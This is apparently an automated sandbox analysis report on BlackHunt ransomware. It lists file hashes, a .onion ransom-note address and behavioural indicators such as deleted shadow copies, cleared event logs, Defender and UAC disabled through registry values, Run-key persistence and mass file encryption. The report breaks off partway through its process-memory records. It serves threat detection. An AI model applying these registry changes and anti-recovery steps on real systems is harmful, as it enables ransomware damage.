Analysis
-
max time kernel
150s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 00:36
Static task
static1
Behavioral task
behavioral1
Sample
b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe
Resource
win10v2004-20231222-en
General
-
Target
b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe
-
Size
707KB
-
MD5
cbddcd0dacb4ab3f8723c044ef220793
-
SHA1
bce925938248d416c88217f8726d197f5fd64db7
-
SHA256
b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c
-
SHA512
0e0774e562204a1e05fead571ed791508bf1d90141111505941ca66899be5ed1dae31703312ba779eac9d314636c9e77e17efd758d39bf6ccc73d59ef8cdbf18
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1C88vnh:6uaTmkZJ+naie5OTamgEoKxLWBih
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 8856 fsutil.exe 13020 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 12464 wevtutil.exe 13356 wevtutil.exe 12676 wevtutil.exe 2604 wevtutil.exe 6252 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 7228 bcdedit.exe 10116 bcdedit.exe 6904 bcdedit.exe 14660 bcdedit.exe -
Renames multiple (3377) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 8836 wbadmin.exe 7448 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\R: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\U: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\P: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\A: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\L: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\X: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\J: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\E: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\V: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\N: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\Y: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\I: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\O: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\H: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\K: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\W: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Z: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\T: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\S: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\G: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\M: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluDCFilesEmpty_180x180.svg b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\en-gb\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ro-ro\ui-strings.js b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pl-pl\#BlackHunt_ReadMe.txt b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\content-types.properties b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\next-arrow-default.svg b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-cn\ui-strings.js b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-tw\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nb-no\ui-strings.js b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\#BlackHunt_ReadMe.txt b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\VideoLAN\VLC\plugins\#BlackHunt_ReadMe.hta b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pt-br\ui-strings.js b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\de-de\ui-strings.js b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\VideoLAN\VLC\plugins\spu\#BlackHunt_ReadMe.txt b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ko-kr\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fi-fi\ui-strings.js b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_fi_135x40.svg b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-focus_32.svg b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\#BlackHunt_ReadMe.txt b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ja-jp\#BlackHunt_ReadMe.hta b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\cs-cz\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fi-fi\#BlackHunt_ReadMe.hta b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_nb_135x40.svg b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\s_listview_18.svg b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pl-pl\#BlackHunt_ReadMe.txt b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\#BlackHunt_ReadMe.hta b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\organize_poster.jpg b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\he-il\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Reference Assemblies\#BlackHunt_ReadMe.txt b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-tw\ui-strings.js b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\example_icons2x.png b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sv-se\#BlackHunt_ReadMe.hta b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-fr\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\main.css b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\#BlackHunt_ReadMe.txt b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\tr-tr\ui-strings.js b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\#BlackHunt_ReadMe.hta b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-fr\#BlackHunt_ReadMe.hta b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\VideoLAN\VLC\locale\et\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\dev\cef\#BlackHunt_ReadMe.txt b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\#BlackHunt_ReadMe.hta b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\ui-strings.js b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen.svg b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\ui-strings.js b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\warning.png b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-cn\#BlackHunt_ReadMe.txt b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sk-sk\ui-strings.js b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\#BlackHunt_ReadMe.txt b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\files\dev\cef\#BlackHunt_ReadMe.hta b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-gb\ui-strings.js b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 8956 7976 WerFault.exe 276 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7468 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 6736 vssadmin.exe 8736 vssadmin.exe 7000 vssadmin.exe 8572 vssadmin.exe 3932 vssadmin.exe 404 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 13052 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ Conhost.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 13088 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe Token: SeRestorePrivilege 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe Token: SeBackupPrivilege 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe Token: SeTakeOwnershipPrivilege 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe Token: SeAuditPrivilege 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe Token: SeSecurityPrivilege 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe Token: SeIncBasePriorityPrivilege 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe Token: SeBackupPrivilege 5980 vssvc.exe Token: SeRestorePrivilege 5980 vssvc.exe Token: SeAuditPrivilege 5980 vssvc.exe Token: SeBackupPrivilege 8084 wbengine.exe Token: SeRestorePrivilege 8084 wbengine.exe Token: SeSecurityPrivilege 8084 wbengine.exe Token: SeSecurityPrivilege 12464 wevtutil.exe Token: SeBackupPrivilege 12464 wevtutil.exe Token: SeSecurityPrivilege 13356 wevtutil.exe Token: SeBackupPrivilege 13356 wevtutil.exe Token: SeSecurityPrivilege 6252 wevtutil.exe Token: SeBackupPrivilege 6252 wevtutil.exe Token: SeSecurityPrivilege 12676 wevtutil.exe Token: SeBackupPrivilege 12676 wevtutil.exe Token: SeSecurityPrivilege 2604 wevtutil.exe Token: SeBackupPrivilege 2604 wevtutil.exe Token: SeDebugPrivilege 13052 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2644 wrote to memory of 4980 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 131 PID 2644 wrote to memory of 4980 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 131 PID 2644 wrote to memory of 4056 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 91 PID 2644 wrote to memory of 4056 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 91 PID 2644 wrote to memory of 3004 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 93 PID 2644 wrote to memory of 3004 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 93 PID 2644 wrote to memory of 2908 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 95 PID 2644 wrote to memory of 2908 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 95 PID 2644 wrote to memory of 1352 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 97 PID 2644 wrote to memory of 1352 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 97 PID 2644 wrote to memory of 5060 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 110 PID 2644 wrote to memory of 5060 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 110 PID 2644 wrote to memory of 5008 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 105 PID 2644 wrote to memory of 5008 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 105 PID 2644 wrote to memory of 3328 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 101 PID 2644 wrote to memory of 3328 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 101 PID 2644 wrote to memory of 4692 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 104 PID 2644 wrote to memory of 4692 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 104 PID 2644 wrote to memory of 648 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 102 PID 2644 wrote to memory of 648 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 102 PID 2644 wrote to memory of 1328 2644 